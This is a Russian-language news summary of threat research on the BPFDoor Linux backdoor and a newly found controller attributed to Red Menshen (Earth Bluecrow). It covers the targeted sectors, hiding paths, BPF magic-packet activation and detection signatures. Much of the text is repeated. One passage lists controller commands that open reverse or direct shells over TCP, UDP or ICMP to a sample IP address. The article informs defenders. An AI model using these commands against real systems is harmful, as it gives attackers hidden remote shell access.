BPFDoor — это скрытая вредоносная программа класса backdoor для Linux, обладающая функциями rootkit и созданная для кибершпионажа. Она получила имя Backdoor.Linux.BPFDOOR и применяет технологии обхода детектирования: маскирует имя процесса, не открывает портов и активируется только после получения особой «магической» последовательности сетевых пакетов, что делает её практически невидимой для стандартных сканеров безопасности.
Недавно был выявлен уникальный контроллер для BPFDoor, который ранее не встречался в других атаках. Этот контроллер способен открывать обратную оболочку, обеспечивать боковое перемещение по сети и давать злоумышленнику глубокий доступ к скомпрометированной инфраструктуре. По данным специалистов, контроллер связан с группировкой Red Menshen, которую Trend Micro отслеживает под именем Earth Bluecrow. Эта группа известна своими сложными и целенаправленными атаками.
В течение 2024 года зафиксированы атаки BPFDoor на телекоммуникационные, финансовые и ритейловые организации в Южной Корее, Гонконге, Мьянме, Малайзии и Египте. В частности, в декабре 2024 года атакованы телеком-компании Южной Кореи и Мьянмы, в октябре — ритейл в Малайзии, в сентябре — финансы в Египте, а в январе — телеком в Гонконге. Основная цель — серверы Linux, а вредонос скрывается по путям типа /tmp/zabbix_agent.log, /bin/vmtoolsdsrv, /etc/sysconfig/rhn/rhnsd.conf.
Ключевой техникой BPFDoor является использование Berkeley Packet Filtering (BPF) — технологии для фильтрации сетевых пакетов на уровне ядра системы. BPFDoor загружает в ядро фильтр BPF с определённой сигнатурой («магической последовательностью»). Эта последовательность позволяет активировать вредонос даже через брандмауэр — пакеты проходят обработку на уровне ядра до фильтрации файрволом. Для маскировки BPFDoor не открывает сетевых портов и меняет имя процесса, оставаясь незаметным для классических инструментов мониторинга.
Контроллер BPFDoor требует ввода пароля: он проверяет его, сверяя с жёстко прописанными в программе хешами с использованием MD5 и фиксированной соли. Через контроллер можно запросить открытие обратной оболочки (reverse shell), подключиться напрямую или выбрать работу по TCP, UDP или ICMP. Для активации используются изменяемые магические последовательности байт, а соединение может, при необходимости, шифроваться.
Примеры команд контроллера:
Для обнаружения BPFDoor специалисты советуют анализировать сетевые пакеты на наличие характерных магических последовательностей (например, 0x5293, 0x39393939 для TCP, 0x7255 для UDP, а также специфические значения в ICMP-запросах). Однако пароли могут отличаться в каждой атаке, что усложняет выявление только на их основе.
Атрибуция контроллера и кампаний с BPFDoor с умеренной степенью уверенности указывает на Earth Bluecrow (Red Menshen) благодаря уникальности кода, совпадению тактик и целевых отраслей. Исходники BPFDoor утекли в сеть в 2022 году, но свежие атаки зафиксированы только у Earth Bluecrow — других подобных кампаний не обнаружено.
Схожие методы скрытного внедрения на базе BPF применяют и другие вредоносы, например, Symbiote. BPF внедряется не только в Linux: аналогичные реализации возможны для Solaris (CVE-2019-3010) и даже обсуждается поддержка eBPF в Windows. В этих условиях критически важно уделять внимание анализу BPF-кода и внедрять проактивные меры защиты, используя, например, решения на базе искусственного интеллекта (Trend Cybertron AI).
Системы обнаружения угроз, такие как Trend Micro TippingPoint, уже включают сигнатуры для выявления BPFDoor (45583, 45589, 45590), а сервисы Threat Insights помогают отслеживать активность злоумышленников и их инструменты.
В анализе BPFDoor и его контроллера участвовали Мохаммад Мокбель, Даниэль Лунги, Файке Хаккеборд и Карл Джейсон Пелинья. Индикаторы компрометации для BPFDoor доступны на специализированных ресурсах для защиты инфраструктуры.
Изображение носит иллюстративный характер
Недавно был выявлен уникальный контроллер для BPFDoor, который ранее не встречался в других атаках. Этот контроллер способен открывать обратную оболочку, обеспечивать боковое перемещение по сети и давать злоумышленнику глубокий доступ к скомпрометированной инфраструктуре. По данным специалистов, контроллер связан с группировкой Red Menshen, которую Trend Micro отслеживает под именем Earth Bluecrow. Эта группа известна своими сложными и целенаправленными атаками.
В течение 2024 года зафиксированы атаки BPFDoor на телекоммуникационные, финансовые и ритейловые организации в Южной Корее, Гонконге, Мьянме, Малайзии и Египте. В частности, в декабре 2024 года атакованы телеком-компании Южной Кореи и Мьянмы, в октябре — ритейл в Малайзии, в сентябре — финансы в Египте, а в январе — телеком в Гонконге. Основная цель — серверы Linux, а вредонос скрывается по путям типа /tmp/zabbix_agent.log, /bin/vmtoolsdsrv, /etc/sysconfig/rhn/rhnsd.conf.
Ключевой техникой BPFDoor является использование Berkeley Packet Filtering (BPF) — технологии для фильтрации сетевых пакетов на уровне ядра системы. BPFDoor загружает в ядро фильтр BPF с определённой сигнатурой («магической последовательностью»). Эта последовательность позволяет активировать вредонос даже через брандмауэр — пакеты проходят обработку на уровне ядра до фильтрации файрволом. Для маскировки BPFDoor не открывает сетевых портов и меняет имя процесса, оставаясь незаметным для классических инструментов мониторинга.
Контроллер BPFDoor требует ввода пароля: он проверяет его, сверяя с жёстко прописанными в программе хешами с использованием MD5 и фиксированной соли. Через контроллер можно запросить открытие обратной оболочки (reverse shell), подключиться напрямую или выбрать работу по TCP, UDP или ICMP. Для активации используются изменяемые магические последовательности байт, а соединение может, при необходимости, шифроваться.
Примеры команд контроллера:
- Реверсное подключение по TCP:
/controller -cd 22 –h 192.168.32.156 -ms 8000 - По UDP:
/controller -cud 5353 -h 192.168.32.156 -ms 8000 - По ICMP:
/controller -cid 1 -h 192.168.32.156 -ms 8000 - Прямое подключение для shell:
./controller -cd 22 -h 192.168.32.156
Для обнаружения BPFDoor специалисты советуют анализировать сетевые пакеты на наличие характерных магических последовательностей (например, 0x5293, 0x39393939 для TCP, 0x7255 для UDP, а также специфические значения в ICMP-запросах). Однако пароли могут отличаться в каждой атаке, что усложняет выявление только на их основе.
Атрибуция контроллера и кампаний с BPFDoor с умеренной степенью уверенности указывает на Earth Bluecrow (Red Menshen) благодаря уникальности кода, совпадению тактик и целевых отраслей. Исходники BPFDoor утекли в сеть в 2022 году, но свежие атаки зафиксированы только у Earth Bluecrow — других подобных кампаний не обнаружено.
Схожие методы скрытного внедрения на базе BPF применяют и другие вредоносы, например, Symbiote. BPF внедряется не только в Linux: аналогичные реализации возможны для Solaris (CVE-2019-3010) и даже обсуждается поддержка eBPF в Windows. В этих условиях критически важно уделять внимание анализу BPF-кода и внедрять проактивные меры защиты, используя, например, решения на базе искусственного интеллекта (Trend Cybertron AI).
Системы обнаружения угроз, такие как Trend Micro TippingPoint, уже включают сигнатуры для выявления BPFDoor (45583, 45589, 45590), а сервисы Threat Insights помогают отслеживать активность злоумышленников и их инструменты.
В анализе BPFDoor и его контроллера участвовали Мохаммад Мокбель, Даниэль Лунги, Файке Хаккеборд и Карл Джейсон Пелинья. Индикаторы компрометации для BPFDoor доступны на специализированных ресурсах для защиты инфраструктуры.
